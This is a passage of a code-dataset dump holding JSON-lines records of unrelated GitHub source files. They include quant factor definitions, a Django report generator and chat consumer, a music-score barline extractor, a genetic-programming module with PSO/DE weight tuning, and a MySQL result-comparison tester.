Factors.append(FT.getFactor(\"交互作用\", args={\"指标周期\": str(iLookBackPeriod)}, new_name=f\"brinson_in_{iLookBack}\"))\n Factors.append(FT.getFactor(\"总主动作用\", args={\"指标周期\": str(iLookBackPeriod)}, new_name=f\"brinson_ta_{iLookBack}\"))\n \n UpdateArgs = {\n \"因子表\": \"mf_manager_cn_factor_selection_timing_jy\",\n \"默认起始日\": dt.datetime(2002,1,1),\n \"最长回溯期\": 3650,\n \"IDs\": IDs\n }\n return Factors, UpdateArgs\n\nif __name__==\"__main__\":\n import logging\n Logger = logging.getLogger()\n \n JYDB = QS.FactorDB.JYDB(logger=Logger)\n JYDB.connect()\n \n #TDB = QS.FactorDB.SQLDB(config_file=\"SQLDBConfig_WMTest.json\", logger=Logger)\n TDB = QS.FactorDB.HDF5DB(logger=Logger)\n TDB.connect()\n \n Args = {\"JYDB\": JYDB, \"LDB\": TDB}\n Factors, UpdateArgs = defFactor(args=Args, debug=True)\n \n StartDT, EndDT = dt.datetime(2010, 1, 1), dt.datetime(2021, 10, 20)\n DTs = JYDB.getTradeDay(start_date=StartDT.date(), end_date=EndDT.date(), output_type=\"datetime\")\n DTRuler = JYDB.getTradeDay(start_date=StartDT.date()-dt.timedelta(365), end_date=EndDT.date(), output_type=\"datetime\")\n \n IDs = UpdateArgs[\"IDs\"]\n \n CFT = QS.FactorDB.CustomFT(UpdateArgs[\"因子表\"])\n CFT.addFactors(factor_list=Factors)\n CFT.setDateTime(DTRuler)\n CFT.setID(IDs)\n \n TargetTable = CFT.Name\n CFT.write2FDB(factor_names=CFT.FactorNames, ids=IDs, dts=DTs, \n factor_db=TDB, table_name=TargetTable, \n if_exists=\"update\", subprocess_num=20)\n \n TDB.disconnect()\n JYDB.disconnect()","repo_name":"Scorpi000/QSExt","sub_path":"QSExt/FactorDef/JY/mf_manager_cn_factor_selection_timing_jy.py","file_name":"mf_manager_cn_factor_selection_timing_jy.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"30653092649","text":"#Implemente um programa que recebe um vetor de números inteiros e determina a frequência de cada elemento no vetor, criando um novo vetor com as frequências correspondentes.\n\ndef frequenciaDeElementos(vetor, numero): # Função que recebe um vetor e um número e retorna a frequência do número no vetor\n frequencia = 0 # Variável que vai receber a frequência do número no vetor\n for i in range(len(vetor)): # Loop que vai percorrer o vetor\n if vetor[i] == numero: # Verifica se o valor atual do vetor é igual ao número\n frequencia += 1 # Se for, a frequência recebe mais um\n return frequencia # Retorno da frequência do número no vetor\n\n\nprint(frequenciaDeElementos([1, 1, 3, 4, 5, 6, 7, 8, 9, 10], 1))\n\n","repo_name":"emanoelCarvalho/exercise-logic-programing","sub_path":"src/Python/Vetores/Questao-4.py","file_name":"Questao-4.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35640990178","text":"from component.cipher import *\nfrom django.conf import settings\nfrom datetime import datetime\nimport subprocess\nimport sys\nimport os\nimport shutil\nfrom multiprocessing import Pool\n#import datetime\nfrom concurrent import futures\n\nZIP_PATH='FFReport'\ndef report_exec(cmd):\n try:\n pass#os.system(cmd)\n except Exception as e:\n print(e)\n p = subprocess.Popen(cmd, shell = True,#[sys.executable, os.path.join(settings.BASE_DIR, 'sponsor', 'birt_ff_report.py')],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n x,y = p.communicate()\n return (x,y)\n\nclass FFReport(object):\n \"\"\"Class to generate family factsheet report\"\"\"\n def __init__(self, record_id):\n self.project_detail = record_id\n\n #def report_exec(self, cmd):\n #\tos.system(cmd)\n\n def generate(self):\n cipher = AESCipher()\n obj_slum = self.project_detail.sponsor_project_details.slum\n logged_sponsor = self.project_detail.sponsor_project_details.sponsor_project.sponsor\n sponsored_household = self.project_detail.household_code\n rp_slum_code = str(obj_slum.shelter_slum_code)\n sub_folder = (str(rp_slum_code)+str(len(sponsored_household)) + str(datetime.now())).replace(' ','_')\n folder_name = os.path.join(settings.BASE_DIR, 'media', ZIP_PATH, str(logged_sponsor.organization_name).replace(' ', '_'))\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n folder_name = os.path.join(folder_name, sub_folder)\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n\n execute_command = []\n for household_code in sponsored_household:\n key = cipher.encrypt(str(rp_slum_code) + '|' + str(household_code) + '|' + str(logged_sponsor.user.id))\n file = os.path.join(folder_name, \"household_code_\" + str(household_code) + \".pdf\")\n com = settings.BIRT_REPORT_CMD.format(file , key)\n #print com\n execute_command.append(com)\n #p = subprocess.Popen(com, shell = True,#[sys.executable, os.path.join(settings.BASE_DIR, 'sponsor', 'birt_ff_report.py')],\n # stdout=subprocess.PIPE,\n # stderr=subprocess.PIPE)\n #x,y = p.communicate()\n\n #print x,y\n #os.system(com)\n #print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n try:\n with futures.ThreadPoolExecutor(max_workers=3) as pool:\n pool.map(report_exec, execute_command)\n #p = Pool(2)\n #p.map(report_exec, execute_command)\n #p.close()\n #p.join()\n except Exception as e:\n print(e)\n #print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n shutil.make_archive(folder_name, 'zip',folder_name)\n delete_command = \"rm -rf \" + folder_name\n os.system(delete_command)\n\n if self.project_detail.zip_file:\n storage, path = self.project_detail.zip_file.storage, self.project_detail.zip_file.path\n storage.delete(path)\n\n #self.project_detail.zip_file=os.path.join('media', ZIP_PATH, str(logged_sponsor.organization_name).replace(' ','_'),sub_folder+'.zip')\n #self.project_detail.zip_created_on=datetime.now()\n self.project_detail.__class__.objects.filter(pk=self.project_detail.id).update(zip_created_on=datetime.now(),zip_file=os.path.join( ZIP_PATH, str(logged_sponsor.organization_name).replace(' ','_'),sub_folder+'.zip'))\n","repo_name":"ShelterAssociates/Shelter","sub_path":"sponsor/birt_ff_report.py","file_name":"birt_ff_report.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"5858889284","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom . import natural_language_processing\nimport json\n\n\ndef index(request):\n context = {\n\n }\n return render(request,'index.html',context)\n\ndef classify(request):\n if request.method == 'POST':\n query = request.POST.get('news',None)\n print(type(query))\n print(query)\n result = natural_language_processing.predict_news(query)\n result = result[0]\n if result == 0:\n return HttpResponse(\"Other News\")\n elif result == 1:\n return HttpResponse(\" Sports news !!!\")\n else:\n pass\n","repo_name":"zparvez2z/News_classifier","sub_path":"News_classifier/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74323074484","text":"import os\n\n\nclass PDF2TXT:\n def __init__(self):\n pass\n\n def pdf2txt(self, file_path: str, raise_errors=True) -> str:\n if not file_path.endswith('.pdf'):\n if raise_errors:\n raise Exception('Failed to LOAD file. Must be PDF')\n else:\n return None\n\n file_out_path = file_path[:-4] + '.txt'\n\n # main command\n cmd = 'pdftotext \"%s\" \"%s\"' % (file_path, file_out_path)\n os.system(cmd)\n\n if not os.path.isfile(file_out_path) or os.path.getsize(file_out_path) == 0:\n if raise_errors:\n raise Exception('pdf2txt: Failed to generate TXT (No .txt file))')\n else:\n return None\n\n try:\n with open(file_out_path, 'r', encoding='unicode_escape') as f:\n text = ' '.join(f.readlines())\n if '\\x00' in text:\n text = text.replace('\\x00', ' ')\n text = text.encode('utf-8', 'replace').decode('utf-8')\n except Exception as e:\n if raise_errors:\n raise Exception('Decode problem. No .txt file. ' + str(e))\n else:\n return None\n\n return text\n","repo_name":"ishvlad/mlprior","sub_path":"utils/pdf2txt.py","file_name":"pdf2txt.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33225068831","text":"import numpy as np\r\nimport os\r\n\r\nPath= os.getcwd().replace('\\\\','/')+'/P862/Software/source/'\r\nscorelist=[]\r\n#--------Calculate the average score-----------------------------#\r\nwith open(Path+'_pesq_results.txt','r') as file:\r\n for line in file.readlines()[1:]:\r\n line=line.strip()\r\n if len(line)!=0:\r\n score=line.split('\\t')[1]\r\n scorelist.append(float(score))\r\nabc=np.array(scorelist)\r\nprint('The average score of PESQ is %.3f' %np.mean(abc))\r\n ","repo_name":"SIFANWU/Deep-Denoising-Autoencoder","sub_path":"PESQ_score.py","file_name":"PESQ_score.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"1700837919","text":"import json\n\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.room_name = None\n self.room_group_name = None\n self.user = None\n\n async def connect(self):\n self.room_name = self.scope[\"url_route\"][\"kwargs\"][\"room_name\"]\n self.room_group_name = f\"chat_{self.room_name}\"\n self.user = self.scope[\"user\"].username or \"Anonymous\"\n\n # join room group\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n await self.accept()\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(self.room_group_name, self.channel_name)\n\n async def receive(self, text_data):\n # load text_date => come from response\n text_data_json = json.loads(text_data)\n # get message from text_data_json\n message = text_data_json[\"message\"]\n \n await self.channel_layer.group_send(\n self.room_group_name,\n {\"type\": \"send_message\", \"message\": message, \"username\": self.user},\n )\n\n async def send_message(self, event):\n message = event[\"message\"]\n username = event[\"username\"]\n\n await self.send(\n text_data=json.dumps({\"message\": message, \"username\": username})\n )\n","repo_name":"faresemad/DjChat","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29920032683","text":"\n\nimport cv2\nimport numpy as np\n\nfrom . import layers\nfrom .bbox import *\nfrom .utils import get_unit_size\nfrom .general_filtering_rules import filter_out_of_range_bbox\n\n\ndef get_degree(line):\n return np.rad2deg(np.arctan2(line[3] - line[1], line[2] - line[0]))\n\n\ndef filter_lines(lines, min_degree=75):\n staffs = layers.get_layer('staffs')\n\n lines = filter_out_of_range_bbox(lines)\n min_y = min([st.y_upper for st in staffs.reshape(-1, 1).squeeze()])\n max_y = max([st.y_lower for st in staffs.reshape(-1, 1).squeeze()])\n\n cands = []\n for line in lines:\n degree = get_degree(line)\n if degree < min_degree:\n continue\n\n if line[1] < min_y or line[3] > max_y:\n continue\n\n cands.append(line)\n return cands\n\n\ndef get_barline_map(symbols, bboxes):\n img = np.zeros_like(symbols)\n for box in bboxes:\n box = list(box)\n if box[2]-box[0] == 0:\n box[2] += 1\n img[box[1]:box[3], box[0]:box[2]] += symbols[box[1]:box[3], box[0]:box[2]]\n img[img>1] = 1\n return img\n\n\ndef get_barline_box(bmap):\n ker = np.ones((5, 2), dtype=np.uint8)\n ext_bmap = cv2.erode(cv2.dilate(bmap.astype(np.uint8), ker), ker)\n bboxes = get_bbox(ext_bmap)\n\n valid_box = []\n heights = []\n for box in bboxes:\n unit_size = get_unit_size(*get_center(box))\n h = box[3] - box[1]\n if h > unit_size:\n heights.append(h)\n valid_box.append(box)\n\n return valid_box\n\n\ndef draw_lls(lines, ori_img):\n img = to_rgb_img(ori_img)\n for line in lines:\n degree = get_degree(line)\n cv2.rectangle(img, (line[0], line[1]), (line[2], line[3]), (0, 255, 0), 2)\n msg = f\"{degree:.2f}\"\n cv2.putText(img, msg, (line[2]+2, line[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 0, 0), 1)\n return img\n\n\nif __name__ == \"__main__\":\n symbols = layers.get_layer('symbols_pred')\n stems = layers.get_layer('stems_rests_pred')\n notehead = layers.get_layer('notehead_pred')\n clefs = layers.get_layer('clefs_keys_pred')\n staffs = layers.get_layer('staffs')\n\n mix = symbols - stems - notehead - clefs\n mix[mix<0] = 0\n\n lines = find_lines(mix)\n lines = filter_lines(lines)\n bmap = get_barline_map(symbols, lines) + stems\n bmap[bmap>1] = 1\n bboxes = get_barline_box(bmap)\n\n bmap = to_rgb_img(bmap)\n for box in bboxes:\n cv2.rectangle(bmap, (box[0], box[1]), (box[2], box[3]), (0, 255, 0), 2)\n unit_size = get_unit_size(*get_center(box))\n ratio = (box[3] - box[1]) / unit_size\n if ratio > 9:\n cv2.putText(bmap, f\"{ratio:.2f}\", (box[2]+2, box[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 1)\n","repo_name":"meteo-team/oemer","sub_path":"oemer/barline_extraction.py","file_name":"barline_extraction.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"76"} +{"seq_id":"25875450900","text":"'''\nCreated on 10 Jan 2021\n\n@author: danan\n'''\nimport numpy as np\ndef strel( line_length=15, degrees=0):\n \n deg90 = degrees%90\n if deg90 > 45:\n alpha = np.pi * (90 - deg90) / 180\n else:\n alpha = np.pi * deg90 / 180\n ray = (line_length - 1)/2;\n \n ## We are interested only in the discrete rectangle which contains the diameter\n ## However we focus our attention to the bottom left quarter of the circle,\n ## because of the central symmetry.\n c = int(round (ray * np.cos (alpha)) +1)\n r = int(round (ray * np.sin (alpha)) +1)\n ## Line rasterization\n line = np.zeros((r, c))\n m = np.tan(alpha)\n cols = np.array(range(1,c+1))\n rows = float(r) - np.fix (m * (cols - 0.5))\n for i in range(len(cols)):\n line[int(rows[i] - 1), int(cols[i] -1)] = 1\n #preparing blocks \n linestrip = line[0,0:-1]\n linerest = line[1:,0:-1]\n z = np.zeros((r-1,c))\n \n #Assemblying blocks\n subA = np.hstack((z,linerest[::-1,::-1]))\n subB = np.hstack((linestrip,1,linestrip[::-1]))\n subC = np.hstack((linerest,z[::-1,::-1]))\n res = np.vstack((subA, subB, subC))\n \n #rotate transpose or flip\n sect = np.fix((degrees%180)/45)\n if sect == 1:\n #transpose res\n res = res.transpose()\n elif sect == 2:\n #90 deg rotation\n res = np.rot90(res)\n elif sect == 3:\n #fliplr\n res = np.fliplr(res)\n #otherwise do nothing\n \n return res\n\n\n\n","repo_name":"shmueldanan/Branching_Angle","sub_path":"Branching_Angle/strel_func.py","file_name":"strel_func.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42435257607","text":"#program to open camera using python\n\n\nimport cv2\ncam = cv2.VideoCapture(0)\n\nwhile cam.isOpened():\n ret,frame = cam.read()\n\n if cv2.waitKey(10) == ord('q'):\n break\n\n cv2.imshow(\"man man\", frame)\n","repo_name":"johnirungumathenge/PYTHON","sub_path":"python_projects/cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13621185558","text":"import numpy as np\nfrom numpy.random import random, randint\nimport time\nfrom copy import deepcopy\nimport random as rnd\n\nfrom simplegp.Variation import Variation\nfrom simplegp.Selection import Selection\nfrom simplegp.DifferentialEvolution import DifferentialEvolution\nfrom PSO import PSO\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\n\nclass SimpleGP:\n\n def __init__(\n self,\n fitness_function,\n functions,\n terminals,\n pop_size=500,\n crossover_rate=0.5,\n mutation_rate=0.5,\n max_evaluations=-1,\n max_generations=-1,\n max_time=60,\n initialization_max_tree_height=4,\n max_tree_size=20,\n tournament_size=2,\n genetic_algorithm=\"PSO\",\n every_n_generation=1,\n weight_tune_percent=0.05, # Put to 1 if all trees should be weight-tuned\n weight_tune_selection=\"worst\", # Choose from \"best\", \"worst\", \"random\"\n ga_population_size=40,\n ga_iterations=100,\n de_mutation_rate=0.3,\n de_recombination_rate=0.3\n ):\n\n self.pop_size = pop_size\n self.fitness_function = fitness_function\n self.functions = functions\n self.terminals = terminals\n self.crossover_rate = crossover_rate\n self.mutation_rate = mutation_rate\n self.max_evaluations = max_evaluations\n self.max_generations = max_generations\n self.max_time = max_time\n self.initialization_max_tree_height = initialization_max_tree_height\n self.max_tree_size = max_tree_size\n self.tournament_size = tournament_size\n self.de_mutation_rate = de_mutation_rate\n self.de_recombination_rate = de_recombination_rate\n self.ga_iterations = ga_iterations\n self.ga_population_size = ga_population_size\n\n self.genetic_algorithm = genetic_algorithm\n self.every_n_generation = every_n_generation\n self.weight_tune_percent = weight_tune_percent\n self.weight_tune_selection = weight_tune_selection\n\n self.generations = 0\n\n def __ShouldTerminate(self):\n must_terminate = False\n elapsed_time = time.time() - self.start_time\n if self.max_evaluations > 0 and self.fitness_function.evaluations >= self.max_evaluations:\n must_terminate = True\n elif self.max_generations > 0 and self.generations >= self.max_generations:\n must_terminate = True\n elif self.max_time > 0 and elapsed_time >= self.max_time:\n must_terminate = True\n\n if must_terminate:\n print('Terminating at\\n\\t',\n self.generations, 'generations\\n\\t', self.fitness_function.evaluations, 'evaluations\\n\\t',\n np.round(elapsed_time, 2), 'seconds')\n\n return must_terminate\n\n def Run(self):\n self.start_time = time.time()\n\n population = []\n for i in range(self.pop_size):\n population.append(\n Variation.GenerateRandomTree(self.functions, self.terminals, self.initialization_max_tree_height))\n self.fitness_function.Evaluate(population[i])\n\n repeat = False # repeat if 3 times in a row the GP gets the same result for elite\n prev_fitness = 0\n count_repeat = 0 # number of times the same fitness value got repeated\n\n while not self.__ShouldTerminate():\n\n O = []\n\n for i in range(len(population) - 1):\n\n o = deepcopy(population[i])\n if (random() < self.crossover_rate):\n o = Variation.SubtreeCrossover(o, population[randint(len(population))])\n if (random() < self.mutation_rate):\n o = Variation.SubtreeMutation(o, self.functions, self.terminals,\n max_height=self.initialization_max_tree_height)\n\n if len(o.GetSubtree()) > self.max_tree_size:\n del o\n o = deepcopy(population[i])\n else:\n self.fitness_function.Evaluate(o)\n\n O.append(o)\n\n PO = population + O\n population = Selection.TournamentSelect(PO, len(population), tournament_size=self.tournament_size)\n\n # self.show_best_treesize_histogram(selected_population, population)\n\n if prev_fitness == np.round(self.fitness_function.elite.fitness, 3):\n count_repeat += 1\n else:\n prev_fitness = np.round(self.fitness_function.elite.fitness, 3)\n count_repeat = 0\n\n if count_repeat >= 2:\n repeat = True\n\n # if self.generations % self.every_n_generation == 0 and self.generations != 0:\n if repeat and self.genetic_algorithm:\n\n # Do the selection on the current population\n if self.weight_tune_percent != 1:\n if self.weight_tune_selection == \"random\":\n selection = list(range(len(population)))\n rnd.shuffle(selection)\n selected_population = [population[i] for i in\n selection[:int(self.weight_tune_percent * len(selection))]]\n else:\n fitness_pop = [p.fitness for p in population]\n arg_fitness = np.argsort(fitness_pop)\n sorted_population = [population[i] for i in arg_fitness]\n if self.weight_tune_selection == \"best\":\n selection = range(int(len(sorted_population) * self.weight_tune_percent))\n selected_population = [sorted_population[i] for i in selection]\n elif self.weight_tune_selection == \"worst\":\n total = len(sorted_population)\n selection = range(int(total - self.weight_tune_percent * total), total)\n selected_population = [sorted_population[i] for i in selection]\n else:\n selected_population = population\n\n # Tune the weights for every tree in the selected population\n print(self.genetic_algorithm, 'tuning on', self.weight_tune_selection, len(selected_population), 'of', len(population), 'trees:')\n for p in tqdm(selected_population):\n if len(p.GetSubtree()) > 1:\n nodes = p.GetSubtree()\n W = [] # weight vector\n for n in nodes:\n W.append(n.weights)\n # bounds needed for both algorithms\n bounds = [(-25, 25)] * len(W) * 2\n if self.genetic_algorithm == \"PSO\":\n pso = PSO(self.fitness_function.Evaluate, W, bounds, p, self.ga_population_size,\n self.ga_iterations, self.start_time, self.max_time)\n W = pso.solution()\n\n elif self.genetic_algorithm == \"DE\":\n W = DifferentialEvolution.main(self.fitness_function.Evaluate, p, bounds, self.ga_population_size, self.de_mutation_rate,\n self.de_recombination_rate, self.ga_iterations, self.start_time, self.max_time)\n\n nodes = p.GetSubtree()\n for n in nodes:\n n.weights = [W.pop(), W.pop()]\n\n repeat = False\n count_repeat = 0\n\n self.generations = self.generations + 1\n\n print('g:', self.generations, 'elite fitness:', np.round(self.fitness_function.elite.fitness, 3), ', size:',\n len(self.fitness_function.elite.GetSubtree()))\n\n return self.spreadsheet_string()\n\n def show_treesize_histogram(self, population):\n treesizes = []\n for p in population:\n treesizes.append(len(p.GetSubtree()))\n # print(treesizes)\n plt.hist(treesizes, bins=range(1, self.max_tree_size))\n plt.show()\n\n def show_best_treesize_histogram(self, best_population, total_population):\n total_treesizes = []\n for p in total_population:\n total_treesizes.append(len(p.GetSubtree()))\n best_treesizes = []\n for p in best_population:\n best_treesizes.append(len(p.GetSubtree()))\n bins = range(1, self.max_tree_size)\n plt.hist(total_treesizes, bins, label=\"total population\")\n plt.hist(best_treesizes, bins, label=\"best population\")\n plt.legend(loc='upper right')\n plt.show()\n\n def spreadsheet_string(self):\n elapsed_time = np.round(time.time() - self.start_time, 2)\n myList = [self.generations, self.fitness_function.evaluations, elapsed_time, self.pop_size, self.crossover_rate,\n self.mutation_rate, self.max_evaluations, self.max_generations, self.max_time,\n self.initialization_max_tree_height, self.max_tree_size, self.tournament_size, self.genetic_algorithm,\n self.weight_tune_percent, self.weight_tune_selection, self.ga_population_size, self.ga_iterations,\n self.de_mutation_rate, self.de_recombination_rate]\n result = ','.join(map(str, myList))\n return result\n\n def show_weight_histogram(self, weights, bounds):\n plt.hist(weights, range=bounds, bins=range(bounds[0], bounds[1], 2))\n plt.xlabel(\"Value of weights\")\n plt.ylabel(\"Frequency\")\n plt.title(\"Distribution of weights after weight-tuning\")\n plt.show()","repo_name":"thbolijn/SimpleGP","sub_path":"simplegp/Evolution/Evolution.py","file_name":"Evolution.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21937436090","text":"from flask import Flask, render_template, jsonify\nimport get_data\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello():\n return render_template(\"base.html\")\n\n@app.route(\"/artists\")\ndef get_artists():\n artist = get_data.get_all_artist()\n artist_arr=[{'id':i[0],'name':i[1]} for i in artist]\n return jsonify(artist_arr)\n\n@app.route(\"/songs/\")\ndef list_all_songs(id):\n songs= get_data.get_all_songs(id)\n artist= get_data.singer(id)\n artists = get_data.get_all_artist()\n songs_arr = [{'id':i[1], \"name\":i[0]} for i in songs]\n return jsonify(songs_arr)\n\n\n@app.route(\"/songs//lyrics/\")\ndef lyrics(sid,id):\n lyrics= get_data.get_lyrics(sid)\n songs= get_data.get_all_songs(id)\n artist= get_data.singer(id)\n artists = get_data.get_all_artist()\n print(lyrics)\n return jsonify(lyrics)\n\nif __name__== \"__main__\":\n app.run(debug=True) \n\n\n","repo_name":"meghahamon/Crawler","sub_path":"cr_flask.py","file_name":"cr_flask.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30367710556","text":"from helpers import Solution\n\nfrom os import path\n\nDIRS = path.dirname(path.dirname(path.abspath(__file__)))\n\nDEFAULT_DATA = path.join(DIRS, \"data\", \"Problem81.txt\")\n\n\nclass MinimalPathSumOfMatrix(Solution):\n def __init__(self, data_path=DEFAULT_DATA):\n assert path.exists(data_path)\n\n with open(data_path, 'r') as io_data:\n self.data = io_data.read().strip().split('\\n')\n self.data = list(map(lambda x: list(map(int, x.split(\",\"))), self.data))\n self.n, self.m = len(self.data), len(self.data[0])\n self.N = (self.n, self.m)\n\n def _chad_solution(self):\n for i in range(self.n - 1, -1, -1):\n for j in range(self.m - 1, -1, -1):\n x = 0\n if i < self.n - 1 and j < self.m - 1:\n x += min(self.data[i + 1][j], self.data[i][j + 1])\n elif i < self.n - 1:\n x += self.data[i + 1][j]\n elif j < self.m - 1:\n x += self.data[i][j + 1]\n\n self.data[i][j] += x\n return self.data[0][0]\n\n def solve(self):\n self._solve(chad=True)\n","repo_name":"jiduque/project-euler","sub_path":"solutions/Problem81.py","file_name":"Problem81.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9440261131","text":"#!/usr/bin/env python3\n\nimport mysql.connector\nfrom enum import Enum\nimport argparse, json\nfrom extractor import *\nfrom numbers import Number\n\n\nDIFF = Enum('DIFF', ['SAME', 'CRASH', 'LEN', 'CONTENT'])\n\ndbs = [33, 11]\ndb_configs = {}\nconns = {}\ncurs = {}\n\ndef build_msg(msg0, msg1):\n return f\"{dbs[0]}: {msg0}, {dbs[1]}: {msg1}\"\n\ndef config_db(dbname, user, password, port):\n config = {}\n config[\"user\"] = user\n config[\"password\"] = password\n config[\"port\"] = port\n db_configs[dbname] = config\n\ndef check_setup(cur, database):\n cur.execute(\"SELECT * FROM information_schema.tables\")\n tables = cur.fetchall()\n for line in tables:\n if len(line) > 0 and line[0] == database:\n return True\n\n print(f\"[ERR] missing {database} table\")\n return False\n\ndef setup_db(dbname):\n # host = /tmp\n config = db_configs[dbname]\n conn = mysql.connector.connect(**config)\n\n conns[dbname] = conn\n curs[dbname] = conn.cursor()\n\n return True\n \ndef execute_dml(conn, cur, dmls):\n for dml in dmls:\n print(\"+\", dml)\n try:\n cur.execute(dml)\n cur.fetchall()\n except:\n if \"DATABASE\" in dml:\n raise(Exception)\n else:\n print(\"Failed\")\n conn.commit()\n print(\"DONE\")\n\ndef execute_and_compare(cur1, cur2, query):\n print(\">\", query)\n err1 = None\n err2 = None\n try:\n cur1.execute(query)\n except Exception as e:\n err1 = e\n try:\n cur2.execute(query)\n except Exception as e:\n err2 = e\n\n if err1 and err2:\n return DIFF.SAME, build_msg(err1, err2)\n\n if not err1 and not err2:\n try:\n ret1 = cur1.fetchall()\n except Exception as e:\n err1 = e\n try:\n ret2 = cur2.fetchall()\n except Exception as e:\n err2 = e\n\n if err1 and err2:\n return DIFF.SAME, build_msg(err1, err2)\n \n if not err1 and not err2:\n if len(ret1) != len(ret2):\n return DIFF.LEN, build_msg(ret1, ret2)\n \n for i in range(len(ret1)):\n ret1[i] = tuple(str(x) if x else \"0\" for x in ret1[i])\n ret2[i] = tuple(str(x) if x else \"0\" for x in ret2[i])\n\n ret1.sort()\n ret2.sort()\n for i in range(len(ret1)):\n if ret1[i] != ret2[i]:\n return DIFF.CONTENT, build_msg(ret1, ret2)\n\n return DIFF.SAME, \"Same ret value\"\n\n return DIFF.CRASH, build_msg(err1, err2)\n\n\ndef main():\n log_dir = \"/home/mysql/sqlancer/target/logs_33_4hour/mysql\"\n test_db = \"database0\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--testdb\", default=test_db, required=False)\n parser.add_argument(\"--logdir\", default=log_dir, required=False)\n parser.add_argument(\"-i\", type=int, required=True)\n args = parser.parse_args()\n\n test_db = args.testdb\n log_dir = args.logdir\n qfile = f\"{log_dir}/{test_db}-cur.log\" \n\n for db in dbs:\n config_db(db, \"root\", \"\", f\"548{db}\")\n ok = setup_db(db)\n if not ok:\n return\n\n\n # extract queries\n print(\"[MSG] extract dml and query\")\n dmls, queries = extract_queries(qfile)\n\n # setup test db\n print(\"[MSG] setup test db\")\n for db in dbs:\n execute_dml(conns[db], curs[db], dmls)\n\n # execute queries and compare results\n query = queries[args.i]\n print(f\"[MSG] Test starts\")\n diff_query_ids = {DIFF.CRASH.value: [], \n DIFF.LEN.value: [], \n DIFF.CONTENT.value: []}\n comp, ret_str = execute_and_compare(curs[dbs[0]], curs[dbs[1]], query)\n print(f\"[{comp}]\", ret_str)\n for db in dbs:\n conns[db].commit()\n\n for db in dbs:\n conns[db].close()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jenny011/ast2023-project","sub_path":"mysql_py/test_one.py","file_name":"test_one.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6367447232","text":"from django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete, m2m_changed\n\nfrom activity.models import ActivityRecord\nfrom subtitles.models import SubtitleLanguage, SubtitleVersion\nfrom videos.models import Video, VideoUrl\nfrom videos import signals\nfrom videos import tasks\n\n@receiver(post_save, sender=SubtitleLanguage)\n@receiver(post_save, sender=SubtitleVersion)\n@receiver(post_save, sender=ActivityRecord)\n@receiver(post_delete, sender=VideoUrl)\n@receiver(post_delete, sender=SubtitleLanguage)\n@receiver(post_delete, sender=SubtitleVersion)\ndef on_video_related_change(sender, instance, **kwargs):\n if instance.video_id is not None:\n Video.cache.invalidate_by_pk(instance.video_id)\n\n@receiver(post_save, sender=Video)\ndef on_video_change(sender, instance, **kwargs):\n instance.cache.invalidate()\n\n@receiver(m2m_changed, sender=Video.followers.through)\ndef on_video_followers_changed(instance, reverse, **kwargs):\n if not reverse:\n instance.cache.invalidate()\n else:\n for video in instance.followed_videos.all():\n video.cache.invalidate()\n\n@receiver(signals.video_added)\ndef on_video_added(sender, video_url, **kwargs):\n tasks.save_thumbnail_in_s3.delay(sender.pk)\n","repo_name":"jasonboulware/Tardigrades","sub_path":"TestAutomation/project/unisubs/apps/videos/signalhandlers.py","file_name":"signalhandlers.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"335990963","text":"from api import Gab\nimport json\n\ngab = Gab('dheerajpreddy', 'Test@123')\nuser_count = 1\nvisited = set()\nqueue = 